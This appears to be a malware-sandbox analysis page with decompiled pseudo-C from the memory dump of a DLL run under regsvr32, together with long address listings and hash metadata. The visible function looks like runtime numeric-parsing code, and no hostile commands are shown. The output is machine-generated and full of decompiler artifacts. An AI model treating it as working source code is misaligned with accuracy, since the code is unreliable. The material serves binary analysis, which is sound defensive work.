						_t303 =  *((intOrPtr*)(_t294 + 0x58));
						r12d =  *(_t294 + 0x38);
						_t244 =  *(_t294 + 0x3c);
						goto L85;
					}
				}
				L1:
				E1003AF40(_t269);
				r9d = 0;
				r8d = 0;
				_t248 = 0;
				 *(_t294 + 0x20) = _t309;
				 *_t269 = 0x16;
				E1003C790(_t274, _t276, _t283, _t284, _t287, _t292, _t295);
				goto L105;
			}











































                                                                              0x10043040
                                                                              0x10043040
                                                                              0x10043040
                                                                              0x10043040
                                                                              0x10043040
                                                                              0x10043040
                                                                              0x10043040
                                                                              0x10043040
                                                                              0x10043040
                                                                              0x10043040
                                                                              0x10043040
                                                                              0x10043040
                                                                              0x1004304a
                                                                              0x10043051
                                                                              0x10043054
                                                                              0x1004305c
                                                                              0x10043060
                                                                              0x10043064
                                                                              0x10043068
                                                                              0x1004306c
                                                                              0x10043070
                                                                              0x10043074
                                                                              0x10043077
                                                                              0x1004307e
                                                                              0x10043084
                                                                              0x10043088
                                                                              0x10043090
                                                                              0x10043098
                                                                              0x1004309d
                                                                              0x100430a5
                                                                              0x100430a8
                                                                              0x100430ad
                                                                              0x100430b0
                                                                              0x100430b5
                                                                              0x100430b8
                                                                              0x100430bd
                                                                              0x100430c2
                                                                              0x100430c8
                                                                              0x100430f3
                                                                              0x100430f6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100430f8
                                                                              0x100430fb
                                                                              0x10043102
                                                                              0x100431bf
                                                                              0x100431c7
                                                                              0x100431ca
                                                                              0x100431ce
                                                                              0x100431d2
                                                                              0x10043108
                                                                              0x10043108
                                                                              0x1004310d
                                                                              0x10043110
                                                                              0x10043118
                                                                              0x1004311f
                                                                              0x10043126
                                                                              0x1004312e
                                                                              0x10043135
                                                                              0x1004313d
                                                                              0x1004313f
                                                                              0x10043146
                                                                              0x1004314c
                                                                              0x1004314e
                                                                              0x10043153
                                                                              0x1004315b
                                                                              0x10043163
                                                                              0x10043163
                                                                              0x1004314c
                                                                              0x1004316b
                                                                              0x10043172
                                                                              0x10043174
                                                                              0x1004317b
                                                                              0x10043181
                                                                              0x10043183
                                                                              0x10043188
                                                                              0x10043190
                                                                              0x10043190
                                                                              0x10043181
                                                                              0x10043198
                                                                              0x100431a0
                                                                              0x100431a2
                                                                              0x100431aa
                                                                              0x100431b2
                                                                              0x100431b2
                                                                              0x100431a0
                                                                              0x100431dc
                                                                              0x100431e4
                                                                              0x100431e9
                                                                              0x100431ed
                                                                              0x100431f0
                                                                              0x100431f3
                                                                              0x100431f6
                                                                              0x100431f9
                                                                              0x100431fe
                                                                              0x10044847
                                                                              0x10044847
                                                                              0x1004484f
                                                                              0x10044851
                                                                              0x10044851
                                                                              0x10044851
                                                                              0x10044851
                                                                              0x00000000
                                                                              0x10043204
                                                                              0x10043204
                                                                              0x10043204
                                                                              0x10043208
                                                                              0x1004320b
                                                                              0x10043210
                                                                              0x10043212
                                                                              0x1004327f
                                                                              0x10043284
                                                                              0x10043289
                                                                              0x10044475
                                                                              0x10044479
                                                                              0x1004447c
                                                                              0x10044481
                                                                              0x10044486
                                                                              0x1004448b
                                                                              0x10044491
                                                                              0x10044495
                                                                              0x10044498
                                                                              0x1004449d
                                                                              0x100445a8
                                                                              0x100445ad
                                                                              0x10044765
                                                                              0x1004476a
                                                                              0x1004476f
                                                                              0x100445b3
                                                                              0x100445b3
                                                                              0x100445b6
                                                                              0x100445b9
                                                                              0x100445be
                                                                              0x100445c3
                                                                              0x100445c8
                                                                              0x100445c8
                                                                              0x10044793
                                                                              0x1004479a
                                                                              0x1004479d
                                                                              0x1004479f
                                                                              0x100447a2
                                                                              0x100447a2
                                                                              0x100447ae
                                                                              0x100447b1
                                                                              0x100447b3
                                                                              0x100447b6
                                                                              0x100447b6
                                                                              0x100447bb
                                                                              0x100447c0
                                                                              0x100447f5
                                                                              0x100447f8
                                                                              0x1004483b
                                                                              0x10044843
                                                                              0x00000000
                                                                              0x10044843
                                                                              0x100447fa
                                                                              0x100447ff
                                                                              0x10044802
                                                                              0x10044807
                                                                              0x10044809
                                                                              0x10044812
                                                                              0x10044818
                                                                              0x1004481d
                                                                              0x10044825
                                                                              0x10044827
                                                                              0x1004482f
                                                                              0x1004482f
                                                                              0x1004482f
                                                                              0x1004482f
                                                                              0x00000000
                                                                              0x100447c2
                                                                              0x100447c2
                                                                              0x100447c5
                                                                              0x100447d7
                                                                              0x100447da
                                                                              0x100447da
                                                                              0x100447e2
                                                                              0x100447ec
                                                                              0x100447ec
                                                                              0x1004485b
                                                                              0x10044863
                                                                              0x100448b2
                                                                              0x100448b2
                                                                              0x100447cc
                                                                              0x100447ce
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100447d0
                                                                              0x100447c0
                                                                              0x100444a3
                                                                              0x100444a3
                                                                              0x100444a8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100444aa
                                                                              0x100444ae
                                                                              0x10044775
                                                                              0x1004477a
                                                                              0x1004477f
                                                                              0x00000000
                                                                              0x1004477f
                                                                              0x100444b4
                                                                              0x100444b9
                                                                              0x10044785
                                                                              0x1004478a
                                                                              0x1004478f
                                                                              0x00000000
                                                                              0x1004478f
                                                                              0x00000000
                                                                              0x100444b9
                                                                              0x1004328f
                                                                              0x10043291
                                                                              0x10043297
                                                                              0x1004329a
                                                                              0x1004329d
                                                                              0x100432a0
                                                                              0x100432a8
                                                                              0x100432b0
                                                                              0x100432b5
                                                                              0x100432b8
                                                                              0x100432bf
                                                                              0x100432c4
                                                                              0x100432c8
                                                                              0x100432d0
                                                                              0x100432d4
                                                                              0x100432d8
                                                                              0x100432dc
                                                                              0x100432e3
                                                                              0x100432e3
                                                                              0x100432f0
                                                                              0x100432f0
                                                                              0x100432f5
                                                                              0x100432f9
                                                                              0x100432fe
                                                                              0x10043303
                                                                              0x1004334b
                                                                              0x1004334b
                                                                              0x1004334e
                                                                              0x10043351
                                                                              0x1004340c
                                                                              0x00000000
                                                                              0x1004340c
                                                                              0x10043357
                                                                              0x10043369
                                                                              0x1004336c
                                                                              0x1004336c
                                                                              0x10043308
                                                                              0x1004330d
                                                                              0x1004330f
                                                                              0x1004333d
                                                                              0x10043341
                                                                              0x10043346
                                                                              0x00000000
                                                                              0x10043346
                                                                              0x10043315
                                                                              0x1004331a
                                                                              0x1004331f
                                                                              0x10043327
                                                                              0x1004332b
                                                                              0x1004332f
                                                                              0x10043334
                                                                              0x1004347b
                                                                              0x1004347b
                                                                              0x1004347b
                                                                              0x10043484
                                                                              0x1004348e
                                                                              0x10043493
                                                                              0x1004349b
                                                                              0x100434a0
                                                                              0x100434a8
                                                                              0x100434d4
                                                                              0x100434aa
                                                                              0x100434aa
                                                                              0x100434b2
                                                                              0x100434ba
                                                                              0x100434be
                                                                              0x100434c6
                                                                              0x100434ca
                                                                              0x100434ca
                                                                              0x100434dc
                                                                              0x100434de
                                                                              0x100434e1
                                                                              0x100434fb
                                                                              0x100434ff
                                                                              0x10043502
                                                                              0x10043505
                                                                              0x1004350c
                                                                              0x10043585
                                                                              0x10043585
                                                                              0x10043588
                                                                              0x10043592
                                                                              0x10043592
                                                                              0x10043594
                                                                              0x10043601
                                                                              0x10043609
                                                                              0x10043611
                                                                              0x10043611
                                                                              0x10043614
                                                                              0x10043617
                                                                              0x100443ff
                                                                              0x10044403
                                                                              0x1004457b
                                                                              0x10044580
                                                                              0x10044582
                                                                              0x10044587
                                                                              0x1004458a
                                                                              0x1004458a
                                                                              0x1004458f
                                                                              0x10044594
                                                                              0x10044599
                                                                              0x1004459e
                                                                              0x00000000
                                                                              0x1004459e
                                                                              0x10044409
                                                                              0x1004440e
                                                                              0x10044413
                                                                              0x10044418
                                                                              0x1004441a
                                                                              0x1004441e
                                                                              0x10044460
                                                                              0x10044465
                                                                              0x1004446a
                                                                              0x1004446e
                                                                              0x00000000
                                                                              0x1004446e
                                                                              0x10043626
                                                                              0x1004362d
                                                                              0x10043634
                                                                              0x10043637
                                                                              0x10043637
                                                                              0x10043596
                                                                              0x10043599
                                                                              0x100435a5
                                                                              0x100435a5
                                                                              0x100435ad
                                                                              0x100435b0
                                                                              0x100435b4
                                                                              0x100435b7
                                                                              0x100435ba
                                                                              0x100435c2
                                                                              0x100435c6
                                                                              0x100435ca
                                                                              0x100435d2
                                                                              0x100435da
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100435dc
                                                                              0x100435df
                                                                              0x1004450d
                                                                              0x100435e5
                                                                              0x100435e5
                                                                              0x100435e5
                                                                              0x10044510
                                                                              0x10044515
                                                                              0x1004451a
                                                                              0x1004451f
                                                                              0x10044524
                                                                              0x10044528
                                                                              0x00000000
                                                                              0x10044528
                                                                              0x1004359b
                                                                              0x1004359e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100435a0
                                                                              0x100435a3
                                                                              0x100435ef
                                                                              0x100435f7
                                                                              0x00000000
                                                                              0x100435f7
                                                                              0x00000000
                                                                              0x100435a3
                                                                              0x1004358a
                                                                              0x1004358c
                                                                              0x100444de
                                                                              0x100444e3
                                                                              0x10044657
                                                                              0x1004465c
                                                                              0x10044661
                                                                              0x10044666
                                                                              0x100444e9
                                                                              0x100444e9
                                                                              0x100444ee
                                                                              0x100444f1
                                                                              0x100444f6
                                                                              0x100444fb
                                                                              0x10044500
                                                                              0x10044505
                                                                              0x10044505
                                                                              0x00000000
                                                                              0x100444e3
                                                                              0x00000000
                                                                              0x1004358c
                                                                              0x1004350e
                                                                              0x10043511
                                                                              0x10043556
                                                                              0x10043556
                                                                              0x1004355b
                                                                              0x1004355b
                                                                              0x1004355b
                                                                              0x10043565
                                                                              0x10043568
                                                                              0x10043568
                                                                              0x1004356d
                                                                              0x1004466e
                                                                              0x10044673
                                                                              0x10044678
                                                                              0x1004467d
                                                                              0x00000000
                                                                              0x1004467d
                                                                              0x10043573
                                                                              0x10043577
                                                                              0x1004357c
                                                                              0x10043581
                                                                              0x00000000
                                                                              0x10043581
                                                                              0x10043513
                                                                              0x10043516
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10043518
                                                                              0x1004351c
                                                                              0x10043521
                                                                              0x10043521
                                                                              0x10043524
                                                                              0x10043527
                                                                              0x1004352c
                                                                              0x10043530
                                                                              0x10043533
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10043535
                                                                              0x10043539
                                                                              0x1004353c
                                                                              0x10043541
                                                                              0x10043543
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10043543
                                                                              0x10043545
                                                                              0x10043549
                                                                              0x10043550
                                                                              0x00000000
                                                                              0x100434e3
                                                                              0x100434e3
                                                                              0x100434e7
                                                                              0x100434eb
                                                                              0x100434f8
                                                                              0x100434f8
                                                                              0x00000000
                                                                              0x100434f8
                                                                              0x100434ed
                                                                              0x100434f1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100434f3
                                                                              0x00000000
                                                                              0x100434f3
                                                                              0x100434e1
                                                                              0x10043214
                                                                              0x10043214
                                                                              0x10043220
                                                                              0x10043220
                                                                              0x10043224
                                                                              0x10043227
                                                                              0x1004322c
                                                                              0x10043231
                                                                              0x10043235
                                                                              0x10043238
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004323a
                                                                              0x10043241
                                                                              0x10043246
                                                                              0x10043248
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004324a
                                                                              0x10043250
                                                                              0x10043260
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10043275
                                                                              0x00000000
                                                                              0x10043275
                                                                              0x10043260
                                                                              0x10043260
                                                                              0x10043264
                                                                              0x1004326c
                                                                              0x10043271
                                                                              0x100444bf
                                                                              0x100444bf
                                                                              0x100444c2
                                                                              0x100444c2
                                                                              0x100444cb
                                                                              0x100444d0
                                                                              0x100444d5
                                                                              0x00000000
                                                                              0x100444d5
                                                                              0x100431fe
                                                                              0x100430ca
                                                                              0x100430ca
                                                                              0x100430cf
                                                                              0x100430d2
                                                                              0x100430d7
                                                                              0x100430d9
                                                                              0x100430de
                                                                              0x100430e4
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7109f1ba7dbb489937d7ec69c2cba449c074f5d54f3a05e5deea4b40d5a6d62b
                                                                              • Instruction ID: 9237b952f01650db252308dee84f6272f5a14659b8ac5f19dc4b4d43db4a21b3
                                                                              • Opcode Fuzzy Hash: 7109f1ba7dbb489937d7ec69c2cba449c074f5d54f3a05e5deea4b40d5a6d62b
                                                                              • Instruction Fuzzy Hash: 99127C3660DBC086D760CF25A44079EB7A0F789B90F219125EFC987B69DF79D885CB08
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1004EBF0 Relevance: .4, Instructions: 437COMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 85%
                                                                              			E1004EBF0(long long __rbx, long long __rcx, signed char** __rdx, long long __rdi, long long __rsi, long long __rbp, signed char* __r8, void* __r9, void* __r10, long long __r12, long long __r13, long long __r14, long long __r15, intOrPtr _a40, intOrPtr _a48, intOrPtr _a64) {
				void* _v8;
				void* _v16;
				void* _v24;
				void* _v32;
				void* _v40;
				void* _v48;
				void* _v56;
				void* _v64;
				signed int _v88;
				signed int _v97;
				char _v120;
				signed int _v134;
				unsigned int _v136;
				signed int _v142;
				unsigned int _v144;
				signed int _v146;
				signed int _v148;
				signed int _v150;
				signed int _v152;
				signed int _v158;
				signed int _v160;
				signed int _v162;
				signed int _v164;
				signed short _v166;
				unsigned int _v168;
				void* _v176;
				long long _v184;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				long long _v216;
				signed int _t152;
				unsigned int _t153;
				signed int _t154;
				signed short _t164;
				signed short _t165;
				signed short _t169;
				signed short _t170;
				signed int _t171;
				signed int _t175;
				signed int _t177;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				signed char _t194;
				signed int _t198;
				signed int _t199;
				signed int _t201;
				signed short _t202;
				signed short _t203;
				signed int _t205;
				signed int _t209;
				signed int _t211;
				signed short _t215;
				signed int _t216;
				signed int _t221;
				void* _t222;
				signed int _t223;
				signed int _t226;
				signed long long _t231;
				unsigned long long _t239;
				signed long long _t243;
				void* _t244;
				long long _t247;
				signed int* _t248;
				signed char* _t251;
				signed long long _t258;
				void* _t261;
				signed int* _t262;
				void* _t263;
				signed int _t264;
				signed long long _t265;
				void* _t266;
				char* _t267;
				signed short* _t268;
				signed char** _t272;
				long long _t274;
				signed int* _t276;

				_t274 = __r14;
				_t263 = __r10;
				_t261 = __r9;
				_t259 = __r8;
				_t250 = __rdi;
				_t245 = __rdx;
				_t236 = __rbx;
				_t265 = _t258;
				_t231 =  *0x1006f4c8; // 0x6f13091946cb
				_t232 = _t231 ^ _t258;
				_v88 = _t232;
				 *((long long*)(_t265 - 8)) = __rbx;
				 *((long long*)(_t265 - 0x10)) = __rbp;
				 *((long long*)(_t265 - 0x18)) = __rsi;
				_t254 = _a64;
				 *((long long*)(_t265 - 0x20)) = __rdi;
				 *((long long*)(_t265 - 0x28)) = __r12;
				 *((long long*)(_t265 - 0x30)) = __r13;
				 *((long long*)(_t265 - 0x38)) = __r14;
				 *((long long*)(_t265 - 0x40)) = __r15;
				_v192 = r9d;
				_t272 = __rdx;
				_v176 = __rcx;
				_t266 = _t265 - 0x78;
				_v196 = 0;
				_t15 = _t250 + 1; // 0x1
				r14d = _t15;
				r10d = 0;
				r15d = 0;
				r12d = 0;
				_v200 = 0;
				_t198 = 0;
				r9d = 0;
				if(_a64 != 0) {
					_t251 = __r8;
					while(1) {
						_t152 =  *_t259 & 0x000000ff;
						__eflags = _t152 - 0x20;
						if(_t152 == 0x20) {
							goto L7;
						}
						__eflags = _t152 - 9;
						if(_t152 == 9) {
							goto L7;
						}
						__eflags = _t152 - 0xa;
						if(_t152 == 0xa) {
							goto L7;
						}
						__eflags = _t152 - 0xd;
						if(_t152 != 0xd) {
							_t239 = 0x10000000;
							while(1) {
								_t259 =  &(_t259[1]);
								__eflags = r9d - 0xb;
								if(r9d <= 0xb) {
									break;
								}
								__eflags = r9d - 0xa;
								if(r9d != 0xa) {
									continue;
								}
								_t221 = 0;
								__eflags = 0;
								__eflags = 0;
								 *_t272 = _t259;
								if(0 == 0) {
									r8d = 0;
									_t211 = 0;
									_t221 = 4;
									goto L106;
								} else {
									__eflags = r10d - 0x18;
									if(r10d <= 0x18) {
										__eflags = r10d;
										if(r10d == 0) {
											r8d = 0;
											_t211 = 0;
											L106:
											_t201 = 0;
											_t153 = 0;
											__eflags = 0;
											L107:
											_t262 = _v176;
											_t154 = _t153 | _v196;
											__eflags = _t154;
											_t262[2] = _t154;
											 *_t262 = _t201;
											_t262[0] = _t211;
											_t262[1] = r8d;
											goto L108;
										}
										L19:
										_t267 = _t266 - 1;
										__eflags =  *_t267;
										if( *_t267 != 0) {
											L22:
											_t25 =  &_v152; // 0x61
											_t26 =  &_v120; // 0x81
											E10052690(r10d, _t236, _t26, _t245, _t251, _t254, _t25, _t261, _t263, _t267);
											__eflags = r14d;
											if(r14d >= 0) {
												r8d = _v200;
											} else {
												r8d = _v200;
												r8d =  ~r8d;
											}
											r8d = r8d + _t198;
											__eflags = r12d;
											if(r12d == 0) {
												r8d = r8d + _a40;
												__eflags = r8d;
											}
											__eflags = r15d;
											if(r15d == 0) {
												r8d = r8d - _a48;
												__eflags = r8d;
											}
											__eflags = r8d - 0x1450;
											if(r8d > 0x1450) {
												_t211 = _t221;
												_t153 = 0x7fff;
												r8d = 0x80000000;
												_t221 = 2;
												_t201 = 0;
												goto L107;
											} else {
												__eflags = r8d - 0xffffebb0;
												if(r8d < 0xffffebb0) {
													r8d = _t221;
													_t211 = _t221;
													_t221 = 1;
													goto L106;
												}
												_t247 = 0x10070ac0;
												__eflags = r8d;
												if(r8d == 0) {
													L101:
													_t201 = _v152 & 0x0000ffff;
													_t211 = _v150;
													r8d = _v146;
													_t153 = _v144 >> 0x10;
													goto L107;
												}
												__eflags = r8d;
												if(r8d < 0) {
													r8d =  ~r8d;
													_t247 = 0x10070c20;
													__eflags = 0x10070c80;
												}
												__eflags = _v192;
												_t160 =  ==  ? 0 : _v152 & 0x0000ffff;
												__eflags = r8d;
												_v152 =  ==  ? 0 : _v152 & 0x0000ffff;
												if(r8d == 0) {
													_t221 = 0;
													__eflags = 0;
												} else {
													r9d = 0xffff8000;
													do {
														_t247 = _t247 + 0x54;
														r8d = r8d >> 3;
														__eflags = r8d & 0x00000007;
														_v200 = r8d;
														_v184 = _t247;
														if((r8d & 0x00000007) == 0) {
															goto L98;
														}
														_t243 = _t232 + _t232 * 2;
														__eflags =  *((short*)(_t247 + _t243 * 4)) - 0x8000;
														_t276 = _t247 + _t243 * 4;
														if( *((short*)(_t247 + _t243 * 4)) >= 0x8000) {
															_t42 =  &_v136; // 0x71
															_t243 = _t42;
															 *_t243 =  *_t276;
															_t191 = _t276[2];
															_t44 =  &_v136; // 0x71
															_t276 = _t44;
															 *(_t243 + 8) = _t191;
															_t232 = _v136 >> 0x10;
															_t192 = _t191 - 1;
															__eflags = _t192;
															_v134 = _t192;
														}
														_t202 = _t276[2] & 0x0000ffff;
														_t164 = _v142 & 0x0000ffff;
														r15d = 0;
														_t203 = _t202 & 0x00007fff;
														_v168 = 0;
														_t165 = _t164 & 0x00007fff;
														_v164 = 0;
														_t215 = (_t202 & 0x0000ffff ^ _t164) & 0x00008000;
														__eflags = _t165 - 0x7fff;
														_v160 = 0;
														_v192 = _t215;
														_t222 = _t232 + _t243;
														if(_t165 >= 0x7fff) {
															L97:
															__eflags = _t215;
															_t247 = _v184;
															_t167 =  !=  ? r9d : 0x7fff8000;
															__eflags = 0x7fff8000;
															_v148 = 0;
															_v152 = 0;
															_v144 =  !=  ? r9d : 0x7fff8000;
														} else {
															__eflags = _t203 - 0x7fff;
															if(_t203 >= 0x7fff) {
																goto L97;
															}
															__eflags = _t222 - 0xbffd;
															if(_t222 > 0xbffd) {
																goto L97;
															}
															__eflags = _t222 - 0x3fbf;
															if(_t222 > 0x3fbf) {
																__eflags = _t165;
																if(_t165 != 0) {
																	L49:
																	__eflags = _t203;
																	if(_t203 != 0) {
																		L54:
																		r13d = 0;
																		_t248 =  &_v164;
																		r12d = 5;
																		do {
																			__eflags = r12d;
																			_t199 = r12d;
																			_t244 = _t272 + _t272;
																			if(r12d <= 0) {
																				goto L69;
																			}
																			_t72 =  &(_t276[2]); // 0x9
																			_t264 = _t72;
																			_t74 = _t244 + 0x60; // 0x65
																			_t268 = _t258 + _t74;
																			_t226 = r13d & 0x00000001;
																			__eflags = _t226;
																			do {
																				_t205 = ( *_t268 & 0x0000ffff) * ( *_t264 & 0x0000ffff);
																				__eflags = _t226;
																				if(_t226 == 0) {
																					r8d = 0;
																					r9d = _t232 + _t244;
																					__eflags = r9d -  *(_t248 - 4);
																					if(r9d <  *(_t248 - 4)) {
																						L64:
																						r8d = 1;
																						L65:
																						 *(_t248 - 4) = r9d;
																						goto L66;
																					}
																					__eflags = r9d - _t205;
																					if(r9d >= _t205) {
																						goto L65;
																					}
																					goto L64;
																				}
																				r8d = 0;
																				r9d = _t232 + _t244;
																				__eflags = r9d -  *(_t248 - 4);
																				if(r9d <  *(_t248 - 4)) {
																					L60:
																					r8d = 1;
																					L61:
																					 *(_t248 - 4) = r9d;
																					goto L66;
																				}
																				__eflags = r9d - _t205;
																				if(r9d >= _t205) {
																					goto L61;
																				}
																				goto L60;
																				L66:
																				__eflags = r8d;
																				if(r8d != 0) {
																					 *_t248 =  *_t248 + 1;
																					__eflags =  *_t248;
																				}
																				_t199 = _t199 - 1;
																				_t268 =  &(_t268[1]);
																				_t264 = _t264 - 2;
																				__eflags = _t199;
																			} while (_t199 > 0);
																			L69:
																			r12d = r12d - 1;
																			_t248 =  &(_t248[0]);
																			r13d = r13d + 1;
																			__eflags = r12d;
																		} while (r12d > 0);
																		_t223 = _t222 + 0xc002;
																		__eflags = _t223;
																		if(__eflags <= 0) {
																			r8d = _v160;
																			_t216 = _v164;
																			r9d = _v168;
																			L84:
																			_t223 = _t223 + 0xffff;
																			__eflags = _t223;
																			if(_t223 >= 0) {
																				L76:
																				_t169 = _v168 & 0x0000ffff;
																				L77:
																				__eflags = _t169 - 0x8000;
																				if(_t169 > 0x8000) {
																					L79:
																					_t170 = _v166;
																					__eflags = _t170 - 0xffffffff;
																					if(_t170 != 0xffffffff) {
																						_t171 = _t170 + 1;
																						__eflags = _t171;
																						_v166 = _t171;
																						_t216 = _v164;
																					} else {
																						_t175 = _v162;
																						_v166 = 0;
																						__eflags = _t175 - 0xffffffff;
																						if(_t175 != 0xffffffff) {
																							_v162 = _t175 + 1;
																							r8d = _v160;
																							_t216 = _v164;
																						} else {
																							_t177 = _v158 & 0x0000ffff;
																							_v162 = 0;
																							__eflags = _t177 - 0xffff;
																							if(_t177 != 0xffff) {
																								_t216 = _v164;
																								_v158 = _t177 + 1;
																								r8d = _v160;
																							} else {
																								_t216 = _v164;
																								_v158 = 0x8000;
																								r8d = _v160;
																								_t223 = _t223 + 1;
																							}
																						}
																					}
																					L94:
																					__eflags = _t223 - 0x7fff;
																					if(_t223 < 0x7fff) {
																						_v150 = _t216;
																						_t247 = _v184;
																						_v146 = r8d;
																						r8d = _v200;
																						_v152 = _v166 & 0x0000ffff;
																						_v142 = _t223 | _v192;
																						r9d = 0xffff8000;
																					} else {
																						__eflags = _v192;
																						_t247 = _v184;
																						r8d = _v200;
																						r9d = 0xffff8000;
																						_v148 = 0;
																						_t174 =  !=  ? r9d : 0x7fff8000;
																						_v152 = 0;
																						_v144 =  !=  ? r9d : 0x7fff8000;
																					}
																					goto L98;
																				}
																				r9d = r9d & 0x0001ffff;
																				__eflags = r9d - 0x18000;
																				if(r9d != 0x18000) {
																					goto L94;
																				}
																				goto L79;
																			}
																			r10d =  ~(_t223 & 0x0000ffff) & 0x0000ffff;
																			_t223 = _t223 + r10w;
																			__eflags = _t223;
																			do {
																				__eflags = _v168 & 0x00000001;
																				if((_v168 & 0x00000001) != 0) {
																					r15d = r15d + 1;
																					__eflags = r15d;
																				}
																				r9d = r9d >> 1;
																				r9d = r9d | _t216 << 0x0000001f;
																				r8d = r8d >> 1;
																				_t216 = _t216 >> 0x00000001 | r8d << 0x0000001f;
																				_t264 = _t264 - 1;
																				__eflags = _t264;
																				_v168 = r9d;
																			} while (_t264 != 0);
																			__eflags = r15d;
																			_v164 = _t216;
																			_v160 = r8d;
																			if(r15d == 0) {
																				goto L76;
																			}
																			_t169 = r9w | 0x00000001;
																			_v168 = _t169;
																			r9d = _v168;
																			goto L77;
																		}
																		r8d = _v160;
																		_t216 = _v164;
																		r9d = _v168;
																		while(1) {
																			asm("inc ecx");
																			if(__eflags < 0) {
																				break;
																			}
																			r8d = r8d + r8d;
																			_t209 = _t216 >> 0x1f;
																			r9d = r9d + r9d;
																			_t216 = _t216 + _t216 | r9d >> 0x0000001f;
																			r8d = r8d | _t209;
																			_t223 = _t223 + 0xffff;
																			_v164 = _t216;
																			_v160 = r8d;
																			__eflags = _t223;
																			_v168 = r9d;
																			if(__eflags > 0) {
																				continue;
																			}
																			goto L84;
																		}
																		__eflags = _t223;
																		if(_t223 <= 0) {
																			goto L84;
																		}
																		goto L76;
																	}
																	_t222 = _t222 + 1;
																	asm("btr eax, 0x1f");
																	__eflags = _t276[2];
																	if(_t276[2] != 0) {
																		goto L54;
																	}
																	__eflags = _t276[1];
																	if(_t276[1] != 0) {
																		goto L54;
																	}
																	__eflags =  *_t276;
																	if( *_t276 != 0) {
																		goto L54;
																	}
																	_t247 = _v184;
																	_v144 = 0;
																	_v148 = 0;
																	_v152 = 0;
																	goto L98;
																}
																_t222 = _t222 + 1;
																asm("btr eax, 0x1f");
																__eflags = _v144;
																if(_v144 != 0) {
																	goto L49;
																}
																__eflags = _v148;
																if(_v148 != 0) {
																	goto L49;
																}
																__eflags = _v152;
																if(_v152 != 0) {
																	goto L49;
																}
																_t247 = _v184;
																_v142 = 0;
																goto L98;
															}
															_t247 = _v184;
															_v144 = 0;
															_v148 = 0;
															_v152 = 0;
														}
														L98:
														__eflags = r8d;
													} while (r8d != 0);
													_t221 = 0;
												}
												goto L101;
											}
										}
										do {
											_t267 = _t267 - 1;
											r10d = r10d + 0xffffffff;
											_t198 = _t198 + 1;
											__eflags =  *_t267;
										} while ( *_t267 == 0);
										goto L22;
									}
									_t193 = _v97 & 0x000000ff;
									__eflags = _t193 - 5;
									if(_t193 >= 5) {
										_t194 = _t193 + 1;
										__eflags = _t194;
										_v97 = _t194;
									}
									_t266 = _t266 - 1;
									r10d = 0x18;
									_t198 = _t198 + 1;
									goto L19;
								}
							}
							_t232 = 0x10000000;
							_t239 = _t239 + 0x10000000;
							goto __rcx;
						}
						L7:
						_t259 =  &(_t259[_t274]);
					}
				} else {
					E1003AF40(_t232);
					r9d = 0;
					r8d = 0;
					_t201 = 0;
					_v216 = __rdi;
					 *_t232 = 0x16;
					E1003C790(__rbx, __rcx, __rdx, __rdi, _t254, __rbp, __r8);
					L108:
					return E10038D20(_t201, _v88 ^ _t258);
				}
			}

















































































                                                                              0x1004ebf0
                                                                              0x1004ebf0
                                                                              0x1004ebf0
                                                                              0x1004ebf0
                                                                              0x1004ebf0
                                                                              0x1004ebf0
                                                                              0x1004ebf0
                                                                              0x1004ebf0
                                                                              0x1004ebfa
                                                                              0x1004ec01
                                                                              0x1004ec04
                                                                              0x1004ec0c
                                                                              0x1004ec10
                                                                              0x1004ec14
                                                                              0x1004ec18
                                                                              0x1004ec20
                                                                              0x1004ec29
                                                                              0x1004ec2d
                                                                              0x1004ec31
                                                                              0x1004ec35
                                                                              0x1004ec39
                                                                              0x1004ec3e
                                                                              0x1004ec41
                                                                              0x1004ec46
                                                                              0x1004ec4a
                                                                              0x1004ec51
                                                                              0x1004ec51
                                                                              0x1004ec55
                                                                              0x1004ec5a
                                                                              0x1004ec5d
                                                                              0x1004ec62
                                                                              0x1004ec66
                                                                              0x1004ec68
                                                                              0x1004ec6b
                                                                              0x1004ec93
                                                                              0x1004ec96
                                                                              0x1004ec96
                                                                              0x1004ec9a
                                                                              0x1004ec9c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004ec9e
                                                                              0x1004eca0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004eca2
                                                                              0x1004eca4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004eca6
                                                                              0x1004eca8
                                                                              0x1004ecaf
                                                                              0x1004ecc0
                                                                              0x1004ecc4
                                                                              0x1004ecc8
                                                                              0x1004eccc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f113
                                                                              0x1004f117
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f11d
